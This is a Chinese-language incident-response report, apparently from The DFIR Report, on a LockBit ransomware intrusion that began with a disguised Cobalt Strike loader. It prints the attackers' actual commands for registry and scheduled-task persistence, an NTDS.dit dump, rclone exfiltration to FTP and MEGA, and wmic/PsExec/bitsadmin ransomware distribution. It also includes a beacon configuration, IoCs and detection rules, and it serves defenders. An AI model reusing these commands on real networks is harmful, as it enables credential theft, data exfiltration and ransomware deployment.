关键要点

• • 此入侵始于下载和执行伪装成 Windows Media Configuration Utility 的 Cobalt Strike 载荷。
• • 攻击者使用 Rclone 从环境中窃取数据。起初，他们尝试用 FTP 传输外带数据，但失败了，然后才开始使用 MEGA.io。一天后，他们再次尝试使用FTP外带数据，这次他们成功了。
• • 攻击者使用计划任务、GhostSOCKS 和 SystemBC 代理以及 Cobalt Strike C2会话访问权限，在环境中创建了多个权限维持后门。
• • 攻击者在入侵开始的第 11 天，从整个被入侵的网络中部署了LockBit 勒索软件。

案例总结

此次入侵始于 2024 年 1 月底，当时用户下载并执行了一个伪装成合法的 Microsoft Windows Media Configuration Utility文件setup_wm.exe，这个文件是一个Cobalt Strike 载荷，并且文件图标与合法程序一致。一旦执行便会与C2服务器建立通信。

在边界突破后大约 30 分钟，Cobalt Strike载荷开始执行一些信息收集操作，执行nltest寻找域控服务器。由于用户直接使用高权限运行了CS载荷，攻击者可以直接利用 SMB 和远程服务将两个代理工具（SystemBC 和 GhostSOCKS）部署到域控制器上。

在域控服务器上Windows Defender检测到了这些工具，起初我们以为这两个工具都被成功拦截了，然而实际上，GhostSOCKS没有运行起来，但 SystemBC 代理仍然处于活动状态，这样攻击者就从域控服务器与C2建立了远程控制会话。攻击者开始在最初失陷的机器上执行其他操作，通过进程注入到WUAUCLT.exe 进程，并尝试从LSASS进程转储登录凭证。

攻击者将 Seatbelt 和 SharpView CLR 模块加载到注入的进程中，并创建计划任务执行 SystemBC 和 GhostSOCKS 代理以进行权限维持。

入侵开始约一个小时后，攻击者使用相同的账户利用远程服务横向移动到文件服务器，在横向移动中部署了一个 Cobalt Strike PowerShell 会话，这个会话连接到另一个C2服务器。

在文件服务器上，攻击者还是相同的套路，部署使用 SystemBC 和 GhostSOCKS 代理，并创建计划任务进行权限维持。不久之后，攻击者通过已建立的代理隧道之一启动了与文件服务器的 RDP 会话。

攻击者在访问主机上的本地组策略编辑器之前，使用任务管理器查看了正在运行的进程。有证据表明他们专门检查了 Windows Defender 配置。在此活动仅几分钟后，就观察到对 Windows Defender 设置的注册表修改，这使我们得出结论，攻击者在本地组策略编辑器中进行了更改。

攻击者浏览了文件服务器上的文件共享，并发现了一个包含存储凭据的敏感文档。接下来，他们尝试将 Cobalt Strike PowerShell 载荷部署到备份服务器。这个操作被成功阻断，但他们从最初的失陷主机发出远程 WMI 命令，禁用了目标服务器上的 Windows Defender 实时监控。不久之后，他们成功通过远程服务将 Cobalt Strike 载荷部署到了备份服务器上，并建立了C2会话。

攻击者通过启动远程 PowerShell 会话来执行 Active Directory 信息收集命令。他们还尝试访问域控制器上的 NTDS.dit 文件。但是，Windows Defender 似乎阻止了这一尝试。同时，在文件服务器上，攻击者执行了一个名为 check.exe 的二进制文件，该二进制文件执行了各种发现活动。此工具探测远程主机，收集其可用性、磁盘使用情况和已安装程序等信息。

攻击者通过 RDP 访问备份服务器，在那里他们查看备份配置并部署 GhostSOCKS 代理，创建计划任务进行权限维持。在此之后，他们的活动暂停了大约两个小时，然后才恢复。

在入侵开始大约四个小时后，攻击者开始尝试外带数据。他们使用文件服务器上的 Internet Explorer 访问多个临时文件共享站点。尽管这些站点通常用于暂存有效负载，但未检测到任何下载。这表明攻击者可能开始上传数据，而不是下载渗透工具。

在尝试外带数据大约 20 分钟后，攻击者开始使用 Rclone 进行数据外带。他们最初尝试通过 FTP传输数据失败了，因为所有连接到他们配置的 FTP 服务器的连接尝试都失败了。这种明显的挫败感导致他们的活动暂停了几个小时。返回后，他们在文件服务器上部署了一个新的 GhostSOCKS 二进制文件，这次通过注册表run key进行权限维持，而不是计划任务。

攻击者再次尝试使用 Rclone 外带数据，这次将 Mega.io 作为远程服务器。成功建立了连接，随后发生了大规模数据泄露，持续了大约 40 分钟。

经过 15 小时的平静后，攻击者开始查看域控制器上 DNS 管理器中的 DNS 配置。然后，他们返回文件服务器，并重新尝试使用 Rclone 和新配置的 FTP 服务器进行数据外带。这一次连接成功，他们开始向新的FTP服务器传输数据并持续了16个小时。同时，在传输数据的同时，他们访问了备份服务器并执行了 PowerShell 脚本，以从备份软件的数据库中提取存储的凭据。

攻击者停止了渗透活动，直到第11天，他们将重点转移到最终目标 — 勒索软件部署上。他们以备份服务器为文件存储点，上传了多个批处理脚本，这些脚本的功能就是自动化部署勒索软件。利用 PsExec 和 BITSAdmin 等工具，他们将勒索软件二进制文件分发到远程主机中，并通过 WMI 和 PsExec 远程执行。为了避免进程被拦截，他们部署了额外的脚本来禁用 Windows Defender 并修改整个网络的 RDP 设置。

攻击者系统地执行了这些脚本，部署了勒索软件二进制ds.exe，该二进制文件被确定为 LockBit 勒索软件。他们成功地将勒索软件传播到环境中的所有 Windows 主机，实现了不到 239 小时的勒索软件攻击时间 （TTR），从边界突破到完成勒索软件部署跨越了 11 个自然日。

Analysts分析师

由r3nzsec、MyDFIR和MittenSec完成的分析和报告

入侵路径分析

边界突破

入侵始于 2024 年 1 月，受害者执行了一个名为 setup_wm.exe 的文件，该文件是从 URL hxxps://accessservicesonline.com/setup_wm.exe下载的。

文件setup_wm.exe是一个加载程序，旨在部署 Cobalt Strike 载荷。域 accessservicesonline[.]com 已被多家安全厂商标记为恶意，并与 Cobalt Strike 相关的活动相关联。

载荷执行

攻击者使用各种手段执行恶意文件。虽然他们在多台主机上创建了计划任务以维持权限，但他们也手动运行了其中的许多任务来执行各种恶意代理工具，如 SystemBC 和 GhostSOCKS。

服务执行也被广泛使用，并在横向移动部分进行了深入讨论。其他观察到的执行模式依赖于 WMI、批处理脚本和 Psexec，这些模式在特定于其使用的其他部分中进行了介绍。

权限维持

计划任务

我们在环境中的多个系统中发现了多个计划任务。这些任务不仅限于最初的失陷主机，而且在整个受感染的网络中都有。

计划任务配置 XML 示例：

注册表run key

作为第二种权限维持方法，攻击者利用 Windows 注册表中的“Run”键在用户登录时自动执行 GhostSOCKS 有效负载。这是通过以下 PowerShell 命令完成的：

powershell -WindowStyle hidden -Command "if (-Not (Test-Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\App')) { Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'App' -Value '%PUBLIC%\Music\svchosts.exe' }"

权限提升

攻击者利用进程注入技术（例如注入合法进程 WUAUCLT.exe）来访问关键系统资源，包括 LSASS 内存空间。

此外，攻击者在 SYSTEM 权限下创建并执行计划任务。例如，他们通过计划任务部署了 DLL 文件（svcmc.dll 和 svcmcc.dll），确保在系统启动时执行这些文件。这些任务是使用以下命令创建和运行的：

schtasks /create /ru SYSTEM /sc ONSTART /tn Update2 /tr "cmd /c rundll32 %PUBLIC%musicsvcmc.dll, MainFunc" schtasks /run /TN Update2

此外，攻击者在横向移动期间，利用管理权限在文件服务器上执行基于 PowerShell 的 Cobalt Strike载荷。攻击者还利用 SMB 传输 SystemBC DLL 和 Golang 后门等工具，这些工具都是通过 SYSTEM 权限执行的。

防御规避

为了欺骗用户，加载程序使用相同的文件名和可执行图标模仿合法的 Microsoft Windows Media Configuration Utility。

作为其防御规避策略的一部分，攻击者采用了多种方法来禁用 Windows Defender。在文件服务器上，攻击者编辑了与 Windows Defender 相关的组策略设置。攻击者打开组策略：

攻击者感兴趣的部分：

几分钟后在主机上观察到注册表修改：

下面显示的命令利用 WMIC 在备份服务器上远程创建进程。然后，执行一个 PowerShell 脚本，该脚本用于禁用Windows Defender 实时监控。

使用 CreateRemoteThread API 调用观察到进程注入到多个系统上的各种合法进程中。钓鱼文件和后来的各种 PowerShell Cobalt Strike 载荷都存在这种行为。

凭证访问

在凭证访问阶段，攻击者利用注入的进程 WUAUCLT 来访问最初的失陷主机、文件服务器和备份服务器上的 LSASS 内存空间。授予的访问权限为 0x1010 和 0x1fffff，这两者都说明攻击者在窃取凭据。

代码0x1010分解如下：

• • 0x00000010 （VMRead）：授予从进程读取内存的能力。
• • 0x00001000 （QueryLimitedInfo）：允许检索某些与进程相关的信息。

相比之下，0x1fffff标志对进程的完全访问权限，使其成为凭据窃取工具的明确特征。标记为 UNKNOWN 的可疑 CallTrace 还揭示了注入的代码活动。

此外，攻击者还尝试通过 PowerShell 远程调用 NTDSUtil 来提取凭据。但是，Windows Defender 阻止了这个操作

尝试的 NTDS.dit 转储命令：

C: WindowsSystem32ntdsutil.exe ac in ntds ifm cr fu C:users publicmusic1

Windows Defender 事件日志指示转储凭据的尝试被阻止：

在备份服务器上，攻击者执行了名为 Veeam-Get-Creds.ps1 的 PowerShell 脚本。此脚本在 GitHub 上公开提供，作为从 Veeam Backup and Replication 凭证管理器恢复密码的方法。

此外，在文件服务器上，攻击者能够找到与共享帐户相关的文件：

发现

setup_wm.exe

在入侵发生大约一个小时后，从 Cobalt Stike载荷观察到一个 PowerShell 命令，该命令运行众所周知的 nltest Microsoft 实用程序来发现 Active Directory 域控服务器。

在此之后，攻击者立即转向域控服务器。但在获得对该主机的横向访问权限后，他们又回到了最初的失陷主机，采取了更多的发现行动。

大约在同一时间，在最初的失陷主机上还观察到一个进程镂空技术创建的WUAUCLT.exe 加载 Seatbelt 和 SharpView 模块。

• • Seatbelt是一种后渗透工具，用于信息收集阶段。它可以收集安全设置、凭据、浏览器历史记录等数据。
• • SharpView是一种 AD 审计工具，可以映射整个 AD 环境并提供用户、组、权限和关系等关键详细信息。

在第一天，攻击者将一个二进制check.exe投放到文件服务器上。

此 Visual Basic GUI 软件接受 IP 地址作为输入，并生成多个文件，其中包含有关相应计算机的详细信息。

大约在攻击者运行 check.exe 的同时，他们启动了与域控服务器的远程 PowerShell 会话，以使用 PowerShell 运行一些 Active Directory 发现。

在文件服务器上，攻击者多次审查 Windows 任务管理器。

在整个入侵过程中，攻击者审查了组策略设置。第一天，他们检查了文件服务器上的 Windows Defender 设置。在最后一天，他们在完成赎金部署后检查了备份服务器。

横向移动

RDP

攻击者在入侵期间使用 RDP。在前两天，他们利用文件服务器作为跳板主机。在最后一天，从最初的失陷主机启动了 RDP 会话到文件服务器和备份服务器。

收集的数据中缺少来自正常 4624 事件的身份验证数据，但使用 Microsoft-Windows-TerminalServices-LocalSessionManager 事件 ID 21 日志，我们能够识别登录活动。

WinRM

在第一天，攻击者使用 WinRM 启动了从文件服务器到域控服务器的远程 PowerShell 会话。然后，此会话用于运行 Active Directory 发现命令。这记录在 Windows PowerShell 日志 eventID 的 4103/4104 中。

本地主机：

远程主机：

WMI

攻击者使用 /node 选项在备份服务器上运行远程命令，然后在勒索软件部署期间远程运行命令，这在 防御规避 和 影响 部分中进一步介绍。

Psexec

攻击者使用 Systinternal 的 Psexec 进行与勒索软件部署相关的远程执行活动，如影响部分所述。

Remote Service/SMB

攻击者反复利用远程服务来横向移动。他们的活动始于将 SystemBC 和 GhostSOCKS 代理工具部署到域控服务器。

以下数据说明了用于将代理工具传输到域控服务器的 SMB 网络活动：

远程服务创建：

这种远程服务创建也可以通过 IDS 检测（如 ET RPC DCERPC SVCCTL – Remote Service Control Manager Access）通过网络进行识别。

后来，他们使用 Cobalt Strike 的跳转psexec_psh功能，通过远程服务在文件共享服务器和备份服务器上执行 PowerShell 信标。

在初始 Base64 解码后，我们发现有效负载使用了默认的 Cobalt Strike XOR 值 35。

在使用 XOR 键 35 解码第二层混淆后，我们有了下一层 base64 字符串。我们可以使用 XOR 键 35 再次解码。作为下一步，我们可以使用下面的 cyber chef 脚本。

Regular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List matches')
From_Base64('A-Za-z0-9+/=',true)
Gunzip()
Label('Decode')
Regular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List matches')
Conditional_Jump('',false,'',10)
From_Base64('A-Za-z0-9+/=',true)
XOR({'option':'Decimal','string':'35'},'Standard',false)

PowerShell 采用 base64 编码。解码 PowerShell 显示 SMB 命名管道：

\.pipefullduplex_84

使用 Didier Stevens 的 1768.py 脚本分析，发现与psexec_psh活动相关的 Cobalt Strike shellcode 匹配。

远程控制

Cobalt Strike (S0154)

最初的C2通信是由执行 setup_wm.exe 触发的 Cobalt Strike 信标 compdatasystems.com。

作为远程控制阶段的一部分，攻击者使用端口 159.100.14.254 通过端口 443 与第二个 Cobalt Strike C2 服务器建立了连接。与此服务器关联的域名是 retailadvertisingservices[.]com。

在此活动期间，我们发现攻击者使用进程注入技术将载荷注入到合法的正常进程中。

在入侵期间持续的C2网络通信

setup_wm.exe 信标的配置如下：

{
    "BeaconType": [
        "HTTPS"
    ],
    "Port": 443,
    "SleepTime": 62760,
    "MaxGetSize": 1864954,
    "Jitter": 37,
    "C2Server": "compdatasystems.com,/_next.css",
    "HttpPostUri": "/boards",
    "Malleable_C2_Instructions": [
        "Remove 814 bytes from the beginning",
        "Base64 decode",
        "Base64 decode"
    ],
    "HttpGet_Verb": "GET",
    "HttpPost_Verb": "POST",
    "HttpPostChunk": 0,
    "Spawnto_x86": "%windir%\syswow64\WUAUCLT.exe",
    "Spawnto_x64": "%windir%\sysnative\WUAUCLT.exe",
    "CryptoScheme": 0,
    "Proxy_Behavior": "Use IE settings",
    "Watermark": 1357776117,
    "bStageCleanup": "True",
    "bCFGCaution": "False",
    "KillDate": 0,
    "bProcInject_StartRWX": "False",
    "bProcInject_UseRWX": "False",
    "bProcInject_MinAllocSize": 10425,
    "ProcInject_PrependAppend_x86": [
        "kJCQkJCQkJA=",
        "Empty"
    ],
    "ProcInject_PrependAppend_x64": [
        "kJCQkJCQkJA=",
        "Empty"
    ],
    "ProcInject_Execute": [
        "CreateThread",
        "RtlCreateUserThread",
        "CreateRemoteThread"
    ],
    "ProcInject_AllocationMethod": "VirtualAllocEx",
    "bUsesCookies": "True",
    "HostHeader": "Host: user.compdatasystems.com"
}

SystemBC

使用动态分析，我们能够确定几个文件是 SystemBC。

与 SystemBC C2服务器的通信从第一天开始，并持续了整个入侵期间。

GhostSOCKS

分析显示，另一个部署的代理是 GhostSOCKS，一种恶意软件即服务 （MaaS） 工具。

这些二进制文件部署在最初的失陷主机以及文件共享服务器和备份服务器上。执行后，这些二进制文件会访问以下C2服务器：

仅在第一天活动的 GhostSocks 服务器的流量。

数据外带

攻击者从文件共享服务器打开 Internet Explorer 并拉取了两个站点 qaz[.]im 和 temp[.]sh。

这两个站点都被称为匿名临时文件共享服务。它们经常被攻击者用来部署工具或有效负载，但在这种情况下，我们没有观察到任何下载。这让我们评估他们可能使用这些网站进行一些小规模的数据外带。
大约 20 分钟后，攻击者继续使用 Rclone 进行大规模渗透。

他们最初尝试使用 Rclone 泄露数据，利用了针对端口 21 的远程服务器 93.115.26.127 的 FTP 配置。此外泄数据尝试失败，因为无法建立与远程服务器的连接。

执行的命令是：

"%PUBLIC%Musicrclone.exe" copy E:REDACTEDcustomers ftp1:REDACTED/customers -q --ignore-existing --REDACTED-confirm --multi-thread-streams 12 --transfers 12 --no-console

两个小时后，攻击者改变了策略，并利用 Rclone 的 MEGA 集成将数据外传到 Mega.io。在第二次尝试期间执行了以下命令：

%WINDIR%system32cmd.exe /C .rclone.exe copy "E:REDACTEDdomain" mega:REDACTED/domain -q --ignore-existing --REDACTED-confirm --multi-thread-streams 12 --transfers 12 --no-console

第二天，攻击者利用第二个 FTP 帐户和硬编码到 rclone 配置中的不同服务器，实现了另一次成功的数据外发。

对网络日志的分析显示，在 16 小时内泄露了数 GB 的数据。

目标达成

第 11 天，攻击者开始部署勒索软件。最后阶段包括跨网络部署的准备工作。该过程从执行名为 SETUP.bat 的批处理脚本开始，该脚本创建了一个临时文件共享：

"%WINDIR%System32cmd.exe" /C "%PUBLIC%MusicSETUP.bat"
net session
net share share$=%PUBLIC%Music /GRANT:Everyone,READ /Y

包括 LockBit 勒索软件加密器、ds.exe、PSExec 和其他帮助程序批处理脚本在内的多个文件已上传到此共享目录，用于勒索软件部署。这些脚本包括用于分发勒索软件二进制文件并执行它。

接下来，一个名为 WMI.bat 的脚本利用 WMI 将勒索软件从共享目录 （SHARE$） 复制到本地计算机并执行它。值得注意的是，攻击者并没有将其目标限制在特定主机上，而是针对已识别子网内的所有可访问主机。执行命令如下：

%WINDIR%system32cmd.exe /c ""%PUBLIC%MusicWMI.bat" %PUBLIC%MusicSETUP.bat %PUBLIC%MusicCOPY.bat %PUBLIC%MusicDEF.bat %PUBLIC%Musicds.exe"

WMI 命令进一步增加了勒索软件的分发，利用 bitsadmin 在远程主机上传输和执行勒索软件。这些命令的父子进程链特征明显，例如从 bitsadmin 命令生成wmiprvse.exe：

wmic /node:ipv4address,REDACTED,REDACTED,REDACTED,REDACTED /user:"domain.localAdministrator" /password:"REDACTED" process call create "cmd.exe /c bitsadmin /transfer update_service \REDACTEDshare$ds.exe %APPDATA%ds.exe&%APPDATA%ds.exe -pass REDACTED"

此外，攻击者使用名为 COPY.bat 的批处理脚本来使用 PSExec 将有效负载从共享目录复制到目标计算机。PSExec 执行的证据可通过服务创建事件（事件 ID 7045）和PSEXESVC.exe执行来识别。相关命令包括：

Source Host 执行 copy.bat，并扩展为 PsExec.exe：

PsExec.exe /accepteula @comps1.txt -u "domain.localAdministrator" -p "REDACTED" cmd /c COPY "\REDACTEDshare$ds.exe" "%WINDIR%temp"

1. 1. 源主机执行

%WINDIR%system32cmd.exe /c ""%PUBLIC%Musicshare$COPY.bat"
       └── "PsExec.exe /accepteula -d \REDACTED -u "domain.localAdministrator" -p "REDACTED" cmd /c COPY /Y "\REDACTEDshare$ds.exe" "%PUBLIC%Music"

目标主机执行命令以将 LockBit 加密程序复制到本地计算机：

1. 2. 服务执行（目标主机）

PSEXECSVC.exe
       └── "cmd" /c COPY /Y "\REDACTEDshare$ds.exe" "%PUBLIC%Music"

攻击者使用名为 EXE1.bat 的批处理文件执行 LockBit 加密器，该文件利用 PSExec 在主机上运行勒索软件二进制文件 ds.exe，并将其复制到他们的 Windows 临时文件夹中。

通过 PSExec 从 Source 主机执行 LockBit：

%WINDIR%system32cmd.exe /c ""C:share$EXE1.bat" "
       └── C:share$PsExec.exe -d @C:share$comps1.txt -u "domain.localAdministrator" -p "REDACTED" cmd /c %WINDIR%tempds.exe -pass REDACTED

攻击者还利用 WMI1.bat 的修改版本通过 WMI 命令分发和执行有效负载，目标是输入文件中列出的主机。此阶段表现出与之前类似的进程行为，wmiprvse.exe生成传输任务：

1. 1. 通过 WMIC 从源主机执行 LockBit：

%WINDIR%system32cmd.exe /c ""C:share$WMI1.bat" "
       └── wmic /node:@C:share$comps1.txt /user:"domain.localAdministrator" /password:"REDACTED" process call create "cmd.exe /c bitsadmin /transfer ds \REDACTEDshare$ds.exe %APPDATA%ds.exe&%APPDATA%ds.exe -pass REDACTED"

与之前的 WMI 执行类似，在远程主机上，wmiprvse.exe 将负责生成 Bitsadmin 传输作业。

1. 1. 通过 WMIC 在目标主机上执行 LockBit：

wmiprvse.exe
       └── cmd.exe /c bitsadmin /transfer ds \REDACTEDshare$ds.exe %APPDATA%ds.exe&%APPDATA%ds.exe -pass REDACTED
           └── bitsadmin /transfer ds \REDACTEDshare$ds.exe %APPDATA%ds.exe

整个部署活动大约需要两个小时。尽管在执行过程中出现了几个错误，但攻击者还是成功部署了 LockBit 勒索软件。加密主机显示修改后的桌面背景，将用户重定向到赎金记录。

时间线

钻石模型

IoCs

Atomic

hxxps://accessservicesonline[.]com/setup_wm.exe

Cobalt Strike:
31.172.83[.]162:443
user[.]compdatasystems[.]com
compdatasystems[.]com
159.100.14[.]254:443
retailadvertisingservices[.]com

SystemBC:
185.236.232[.]20:445

GhostSOCKS:
91[.]142[.]74[.]28|30001
195[.]2[.]70[.]38|30001
38[.]180[.]61[.]247|30001

FTP exfiltration servers:
93.115.26[.]127:21
46.21.250[.]52:21

Computed

File: svchosts.exe
6505b488d0c7f3eaee66e3db103d7b05
bf2b396b8fb0b1de27678aab877b6f177546d1c5
b4ad5df385ee964fe9a800f2cdaa03626c8e8811ddb171f8e821876373335e63

File: dfg.exe
671b967eb2bc04a0cd892ca225eb5034
ab1777107d9996e647d43d1194922b810f198514
b79bb3302691936df7c3315ff3ba7027f722fc43d366ba354ac9c3dac2e01d03

File: svc.dll
03af38505cee81b9d6ecd8c1fd896e0e
1ac66fcc34c0b86def886e4e168030dae096927c
2389b3978887ec1094b26b35e21e9c77826d91f7fa25b2a1cb5ad836ba2d7ec4

File: Veeam-Get-Creds.ps1
0f7b6bb3a239cf7a668a8625e6332639
5263a135f09185aa44f6b73d2f8160f56779706d
18051333e658c4816ff3576a2e9d97fe2a1196ac0ea5ed9ba386c46defafdb88

File: svcmc.dll
ea327ed0a3243847f7cd87661e22e1de
450d54d5737164579416ca99af1eb3fa1d4aaff9
ced4ee8a9814c243f0c157cda900def172b95bb4bc8535e480fe432ab84b9175

File: setup_wm.exe
57f791f7477b1f7a1b3605465d054db8
bba1bc3ebf07ca3c4e2442f0ba9ea18383ce627b
d8b2d883d3b376833fa8e2093e82d0a118ba13b01a2054f8447f57d9fec67030

File: check.exe
6e91c474d90546845b1f3f9e7a33411a
9352236ad6fe8835979cf11ba5033f8f2fef0f19
3f97e112f0c5ddf0255ef461746a223208dc0846bde2a6dca9c825d9c706a4e9

File: svcmcc.dll
0aa05ebc3b6667954898cfccc4057600
c59cbd309b3393cb08a1133364ed11000fdd418d
44cf04192384e920215f0e335561076050129ad7a43b58b1319fa1f950f6a7b6

File: sd.exe
2800a10c4afae44978d906b2abaed745
84019de427aef1f1e4f32b579767bee6d0bd1e64
c1173628f18f7430d792bbbefc6878bced4539c8080d518555d08683a3f1a835

File: SETUP.bat
d9adb3dd6df169e824b2867a2b8cba89
b077ea03b207cc8b8b48b9b4f9a58dabbd39f678
7673a949181e33ff8ed77d992a2826c25b8da333f9e03213ae3a72bb4e9a705d

File: ds.exe
71c8c1a0056fd084bc32a03d9245ad10
5de1f72ffeea1ecbd287b0ca8ddb2c5264d9acb5
59c9d10f06f8cb2049df39fb4870a81999fd3f8a79717df9b309fadeb5f26ef9

File: EXE1.bat
573a213191985c555dd7e8de5f0a9cae
aa19a1648d680c3bfbee7dcc3df41ce98af8e121
ba9b879fdc304bd7f5554528fb8e858ef36ad4657fedfefb8495f43ce73fc6f1

File: EXE.bat
4457256150386acec794e9e8ee412691
c6d54322a17e754150e61f7caa91226a84b0b774
10ce939e4ee8b5285d84c7d694481ebbdf986904938d07f7576d733e830ed012

File: COPY.bat
6d44c5fb49258f285769e50830fc59af
da6771fbbcfaf195b80925cefc880794d62d61bf
3af3f2d08aa598ab4f448af1b01a5ad6c0f8e8982488ebf4e7ae7b166e027a8b

File: WMI.bat
40852fde665eb9119fcc565bd68de680
956e020206c4dc4240537d07be022e86ed918ed1
578a2ac45e40a686a5f625bbc7873becd8eb9fe58ea07b1d318b93ee0d127d4e

File: RDP.bat
996ad32c7ae2190b7fa7876df0d7b717
4a1e667e0c3550f4446903570adbe7776699d4ca
791157675ad77b0ae9feabd76f4b73754a7537b7a9a2cc74bd0924d65be680e1

File: WMI1.bat
90f9044cfee2c678fe51abd098bdfe97
e3619582f4d81ca180dee161bbe49d499b237119
c4863cc28e01713e6a857b940873b0e5caedfd1fcb9b2a8d07ffb4c0c48379d5

File: COPY1.bat
b254f8f03e61bd9469df66c189d79871
45337ae989cd62d07059f867ce62ff6b6fc90819
9bcaad9184b182965923a141f52fb75ddd1975b99ab080869896cee5879ecfad

File: DEF.bat
4794accd22271a28547fb3613ee79218
ccc6b5bf9591fa9a3d57fd48ee0c9c49a6d22da9
53828f56c6894a468a091c8858d2e29144b68d5de8ff1d69a567e97aac996026

Detections

Network

ET POLICY PsExec service created
ET RPC DCERPC SVCCTL - Remote Service Control Manager Access
ET POLICY SMB2 NT Create AndX Request For an Executable File
ET POLICY SMB Executable File Transfer
ET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement
ETPRO MALWARE Cobalt Strike Related Domain in DNS Lookup
ET POLICY Possible Powershell .ps1 Script Use Over SMB
ET POLICY PE EXE or DLL Windows file download HTTP
ETPRO MALWARE Unknown Golang Backdoor Activity
ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1
ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2
ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2
ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1
ET INFO Abused File Sharing Site Domain Observed (qaz .im) in TLS SNI

Sigma

detection.fyi 或 sigmasearchengine.com 上的搜索规则

DFIR 公共规则存储库：

dee0aaa1-b7d7-4be0-ac30-2add7b88d259 : Operator Bring Your Own Tools

DFIR 私有规则：

1aafd4cc-cb38-498b-9365-394f71fd872c : Veeam Credential Dumping Script
b878e8c2-bfa5-4b1d-8868-a798f57d197a : Veeam Credential Dumping Script Execution
baa9adf9-a01c-4c43-ac57-347b630bf69e : Default Cobalt Strike Named Pipes
213d8255-f359-410b-ac27-e7e85c6394a8 : Suspicious Binaries in Public Folders
6df37102-c993-4133-ad3d-b12ca32e03c6 : Detect Process Creation via WMIC with Remote Node

Sigma 存储库：

9f22ccd5-a435-453b-af96-bf99cbb594d4 : WinAPI Function Calls Via PowerShell Scripts
19d65a1c-8540-4140-8062-8eb00db0bba5 : WinAPI Library Calls Via PowerShell Scripts
1f49f2ab-26bc-48b3-96cc-dcffbc93eadf : Potential Suspicious PowerShell Keywords
df69cb1d-b891-4cd9-90c7-d617d90100ce : Suspicious FromBase64String Usage On Gzip Archive : Ps Script
1ff315dc-2a3a-4b71-8dde-873818d25d39 : New BITS Job Created Via Bitsadmin
a762e74f-4dce-477c-b023-4ed81df600f9 : Scheduled Task Created : FileCreation
93ff0ceb-e0ef-4586-8cd8-a6c277d738e3 : Scheduled Task Created : Registry
87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 : Change PowerShell Policies to an Insecure Level
f4bbd493-b796-416e-bbf2-121235348529 : Non Interactive PowerShell Process Spawned
734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8 : Remote PowerShell Session Host Process (WinRM)
8de1cbe8-d6f5-496d-8237-5f44a721c7a0 : Whoami.EXE Execution Anomaly
502b42de-4306-40b4-9596-6f590c81f073 : Local Accounts Discovery
e4a74e34-ecde-4aab-b2fb-9112dd01aed0 : Dynamic CSharp Compile Artefact
61065c72-5d7d-44ef-bf41-6a36684b545f : Elevated System Shell Spawned
0eb46774-f1ab-4a74-8238-1155855f2263 : Disable Windows Defender Functionalities Via Registry Keys
fb843269-508c-4b76-8b8d-88679db22ce7 : Suspicious Execution of Powershell with Base64
89ca78fd-b37c-4310-b3d3-81a023f83936 : Schtasks Creation Or Modification With SYSTEM Privileges
3a6586ad-127a-4d3b-a677-1e6eacdf8fde : Windows Shell/Scripting Processes Spawning Suspicious Programs
1f21ec3f-810d-4b0e-8045-322202e22b4b : Network Connection Initiated By PowerShell Process
7cccd811-7ae9-4ebe-9afd-cb5c406b824b : Potential Execution of Sysinternals Tools
0e7163d4-9e19-4fa7-9be6-000c61aad77a : CobaltStrike Named Pipe Pattern Regex
eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50 : Remote Thread Creation Via PowerShell
b5de0c9a-6f19-43e0-af4e-55ad01f550af : Unsigned DLL Loaded by Windows Utility
9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c : DLL Load By System Process From Suspicious Locations
61a7697c-cb79-42a8-a2ff-5f0cdfae0130 : Potential CobaltStrike Service Installations : Registry
ed74fe75-7594-4b4b-ae38-e38e3fd2eb23 : Outbound RDP Connections Over Non-Standard Tools
cdc8da7d-c303-42f8-b08c-b4ab47230263 : Rundll32 Internet Connection
1277f594-a7d1-4f28-a2d3-73af5cbeab43 : Windows Shell/Scripting Application File Write to Suspicious Folder
bcb03938-9f8b-487d-8d86-e480691e1d71 : Network Connection Initiated From UsersPublic Folder
e37db05d-d1f9-49c8-b464-cee1a4b11638 : PUA : Rclone Execution
02ee49e2-e294-4d0f-9278-f5b3212fc588 : New RUN Key Pointing to Suspicious Folder
20f0ee37-5942-4e45-b7d5-c5b5db9df5cd : CurrentVersion Autorun Keys Modification
69bd9b97-2be2-41b6-9816-fb08757a4d1a : Potentially Suspicious Execution From Parent Process In Public Folder
fff9d2b7-e11c-4a69-93d3-40ef66189767 : Suspicious Copy From or To System Directory
259e5a6a-b8d2-4c38-86e2-26c5e651361d : PsExec Service File Creation
2ddef153-167b-4e89-86b6-757a9e65dcac : File Download Via Bitsadmin To A Suspicious Target Folder
d21374ff-f574-44a7-9998-4a8c8bf33d7d : WmiPrvSE Spawned A Process
d059842b-6b9d-4ed1-b5c3-5b89143c6ede : File Download Via Bitsadmin
fa34b441-961a-42fa-a100-ecc28c886725 : LSASS Access From Program In Potentially Suspicious Folder
5ef9853e-4d0e-4a70-846f-a9ca37d876da : Potential Credential Dumping Activity Via LSASS
4f86b304-3e02-40e3-aa5d-e88a167c9617 : Scheduled Task Deletion
36210e0d-5b19-485d-a087-c096088885f0 : Suspicious PowerShell Parameter Substring
5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via Nltest.EXE
526be59f-a573-4eea-b5f7-f0973207634d : New Process Created Via Wmic.EXE
602a1f13-c640-4d73-b053-be9a2fa58b96 : HackTool : Powerup Write Hijack DLL
37ae075c-271b-459b-8d7b-55ad5f993dd8 : File or Folder Permissions Modifications
178e615d-e666-498b-9630-9ed3630381 : Elevated System Shell Spawned From Uncommon Parent Location
e6e88853-5f20-4c4a-8d26-cd469fd8d31f : Ntdsutil Abuse

Yara

https://github.com/The-DFIR-Report/Yara-Rules/blob/main/27138/27138.yar

ELASTIC_Windows_Ransomware_Lockbit_369E1E94                                                                                                                                                                 
MALPEDIA_Win_Lockbit_Auto                                                                                                                                                                                   
MAL_RANSOM_LockBit_Apr23_1                                                                                                                                                                                  
MAL_RANSOM_LockBit_ForensicArtifacts_Apr23_1                                                                                                                                                                
